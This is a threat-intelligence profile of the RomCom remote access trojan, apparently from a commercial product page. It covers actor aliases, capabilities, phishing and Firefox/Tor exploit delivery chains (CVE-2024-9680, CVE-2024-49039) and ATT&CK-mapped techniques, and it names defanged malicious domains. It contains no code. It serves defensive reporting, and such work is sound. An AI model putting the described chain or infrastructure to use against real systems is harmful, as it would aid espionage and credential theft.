RomCom RAT
RomCom RAT is a remote access trojan deployed since at least mid-2022 and associated with the threat actor commonly tracked as RomCom, also known as Storm-0978, Tropical Scorpius, UAC-0180, UNC2596, Void Rabisu, and by Google as CIGAR. Reporting also links RomCom RAT activity to the Russian-speaking group Nebulous Mantis. The malware is actively maintained and supports command execution and downloading additional modules. Documented capabilities include encrypted C2 communications, execution of more than 40 remote commands via a dedicated operator panel, browser-data theft through additional modules, credential harvesting, system reconnaissance, Active Directory enumeration, lateral movement, and collection of files, credentials, configuration details, and Microsoft Outlook backups. Persistence has been established through Windows Registry manipulation and COM hijacking, and operators have used living-off-the-land techniques and frequently changing infrastructure hosted via bulletproof providers such as LuxHost and Aeza. RomCom infections have been delivered through spear-phishing emails with weaponized document links, and earlier related campaigns used the Hancitor loader. A described multi-stage chain includes a first-stage DLL that contacts C2, retrieves additional payloads including via IPFS hosted on attacker-controlled domains, executes commands, and launches a final-stage C++ implant. RomCom RAT has also been deployed through exploitation chains: Google and ESET reported Firefox and Tor browser exploitation using CVE-2024-9680 together with CVE-2024-49039 to escape the Firefox sandbox and install the malware with elevated privileges; ESET also described a fake-site chain involving economistjournal[.]cloud redirecting to redjournal[.]cloud that resulted in RomCom RAT installation. Most victims identified in that campaign were in Europe and North America. Reported targeting linked to the associated actor includes critical infrastructure, government agencies, political leaders, and NATO-related defense organizations.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
"Proofpoint Links RomCom RAT Hackers to New TransferLoader Malware Activity" ... "TA829, the threat group behind RomCom RAT"
"...Nebulous Mantis that has deployed a remote access trojan called RomCom RAT since mid-2022."
Techniques & procedures
17 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques"Since mid-2022, they’ve deployed RomCom via spear-phishing for espionage, lateral movement, and data theft."
"Attack chains mounted by the group typically involve the use of spear-phishing emails with weaponized document links to distribute RomCom RAT."
Persistence
2 techniquesPrivilege Escalation
2 techniquesStealth
2 techniques"Nebulous Mantis imitates trusted services like OneDrive to trick victims into downloading infected files, often hosted on Mediafire."
Credential Access
1 technique"Nebulous Mantis uses RomCom malware for stealthy attacks involving system profiling, credential harvesting, and AD/domain enumeration."
Discovery
4 techniquesCollection
2 techniques"...collect data of interest, including files, credentials, configuration details, and Microsoft Outlook backups."
"Tools like WinRAR and Plink are deployed, with data exfiltrated from c:\users\public\music."
Command and Control
4 techniques"The first-stage RomCom DLL is designed to connect to a C2 server and download additional payloads using the InterPlanetary File System (IPFS)..."
"The Nebulous Mantis team, which changes the domains they use every month..."
"The attackers used reverse SSH tunnels to ensure persistence."
"The RAT supports advanced evasion techniques, including living-off-the-land (LOTL) tactics and encrypted command and control (C2) communications."
Exfiltration
1 technique"...gathers all critical information from the victim machine and uploads it to their C2 servers."
IOCs tracked for this family
2 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
Recent activity
7 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Remote access trojan used by Nebulous Mantis; uses evasion/LOTL tactics and encrypted C2 (as described).
Remote access trojan referenced in connection with a threat actor cluster (TA829) and overlapping tactics/infrastructure with TransferLoader activity.
Remote access trojan used by the Russia-aligned TA829 for espionage and financial-motivated activity; delivered via phishing tactics (spoofed senders, PDF lures, redirect links) and supported by infrastructure that filters out sandboxed systems.
Remote access trojan used for cyber espionage. Uses living-off-the-land tactics and encrypted C2, leverages bulletproof hosting, establishes persistence via COM hijacking, performs reconnaissance (including time zone discovery), enumerates Active Directory, supports lateral movement, downloads additional payloads/modules (including via IPFS), and can steal browser data and harvest credentials (including Outlook backups).
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.